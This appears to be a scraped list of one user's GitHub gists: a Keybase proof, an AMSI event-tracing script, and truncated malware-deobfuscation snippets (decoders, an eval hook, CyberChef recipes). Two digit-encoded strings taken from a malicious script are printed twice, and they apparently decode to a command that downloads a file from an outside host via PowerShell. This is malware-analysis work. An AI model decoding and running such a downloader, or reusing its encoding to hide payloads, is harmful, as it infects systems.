I hereby claim:
- I am edygert on github.
- I am evandygert (https://keybase.io/evandygert) on keybase.
- I have a public key ASCHN0leVSTiw22_e9JZ3Zjb8hXBgFvydCRe5Gpi_pGkFgo
To claim this, I am signing this object:
I hereby claim:
To claim this, I am signing this object:
# Script author: Matt Graeber (@mattifestation) | |
# logman start AMSITrace -p Microsoft-Antimalware-Scan-Interface Event1 -o AMSITrace.etl -ets | |
# Do your malicious things here that would be logged by AMSI | |
# logman stop AMSITrace -ets | |
$OSArchProperty = Get-CimInstance -ClassName Win32_OperatingSystem -Property OSArchitecture | |
$OSArch = $OSArchProperty.OSArchitecture | |
$OSPointerSize = 32 | |
if ($OSArch -eq '64-bit') { $OSPointerSize = 64 } |
$Seen = @{} | |
foreach ($elem in $AMSIScanEvents) { | |
if (-not $Seen.ContainsKey($elem.Hash)) { | |
$elem | |
$Seen[$elem.Hash] = "" | |
} | |
} |
logman start AMSITrace -p Microsoft-Antimalware-Scan-Interface Event1 -o AMSITrace.etl -ets | |
cscript loveyou.js | |
logman stop AMSITrace -ets | |
AMSIScriptContentRetrieval > loveyou.log | |
Event1 was found using the following: | |
logman query providers Microsoft-Antimalware-Scan-Interface |
#!/usr/bin/env python3 | |
sp_ll = "125135126072127146127058073125058141127142058135135137087137145127140141064064141127142058139079087138064064141127142058139078087130127134134064064125135126073125058063139079063063135135137063063139078063058071127138058124147138123141141058071136137136131058071145058130131126126127136058071136137134137129137058131127146066104127145071105124132127125142058109147141142127135072104127142072113127124093134131127136142067072094137145136134137123126096131134127066065130142142138084073073082081072076077080072076075076072076078075073128131146146073092134123125133072127146127065070062127136144084142127135138058069058065118145136130145072127146127065067085109142123140142071106140137125127141141058062127136144084142127135138118145136130145072127146127085" | |
e_mo = "113141125140131138142072109130127134134" | |
def decode(s): | |
result = "" | |
for n in range(0, len(s), 3): | |
ch = chr(int(s[n:n+3]) - 26) |
original_eval = eval; | |
eval = function(input_string) { | |
WScript.Echo(input_string); | |
original_eval(input_string); | |
} |
Regular_expression('User defined','[a-zA-Z0-9+/=]{40,}',true,true,false,false,false,false,'List matches') | |
From_Base64('A-Za-z0-9+/=',true) | |
Decode_text('UTF-16LE (1200)') | |
Regular_expression('User defined','[a-zA-Z0-9+/=]{20,}',true,true,false,false,false,false,'List matches') | |
From_Base64('A-Za-z0-9+/=',true) | |
Gunzip() | |
Regular_expression('User defined','[a-zA-Z0-9+/=]{30,}',true,true,false,false,false,false,'List matches') | |
From_Base64('A-Za-z0-9+/=',true) | |
XOR({'option':'Decimal','string':'35'},'Standard',false) |
E_MO = "113141125140131138142072109130127134134" | |
SP_LL ="125135126072127146127058073125058141127142058135135137087137145127140141064064141127142058139079087138064064141127142058139078087130127134134064064125135126073125058063139079063063135135137063063139078063058071127138058124147138123141141058071136137136131058071145058130131126126127136058071136137134137129137058131127146066104127145071105124132127125142058109147141142127135072104127142072113127124093134131127136142067072094137145136134137123126096131134127066065130142142138084073073082081072076077080072076075076072076078075073128131146146073092134123125133072127146127065070062127136144084142127135138058069058065118145136130145072127146127065067085109142123140142071106140137125127141141058062127136144084142127135138118145136130145072127146127085" | |
WScript.Echo B_RA(E_MO) | |
WScript.Echo B_RA(SP_LL) | |
Public Function B_RA(byref N_UN) | |
For O_MI = 1 To Len(N_UN) Step 3 | |
A_DE = Mid(N_UN, O_MI, 3) | |
C_YS = C_YS + Chr(int(A_DE) - 26) |
Regular_expression('User defined','Hextostring\\(\\"[^"]+\\"\\), Hextostring\\(\\"[^"]+\\"\\)',true,true,false,false,false,false,'List matches') | |
Fork('\\n','\\n',false) | |
Register('Hextostring\\(\\"([^"]+)\\"\\), Hextostring\\(\\"([^"]+)\\"\\)',true,false,false) | |
Find_/_Replace({'option':'Regex','string':'^.*$'},'$R0',true,false,true,false) | |
From_Hex('Auto') | |
XOR({'option':'Hex','string':'$R1'},'Standard',false) |
paths | |
| join(".") | |
| select(test("[.][1-9][0-9]*[.|$]?") | not) | |
| gsub("[.]0[.]"; "[].") | |
| sub("[.]0$"; "[]") | |
| sub("^"; ".") |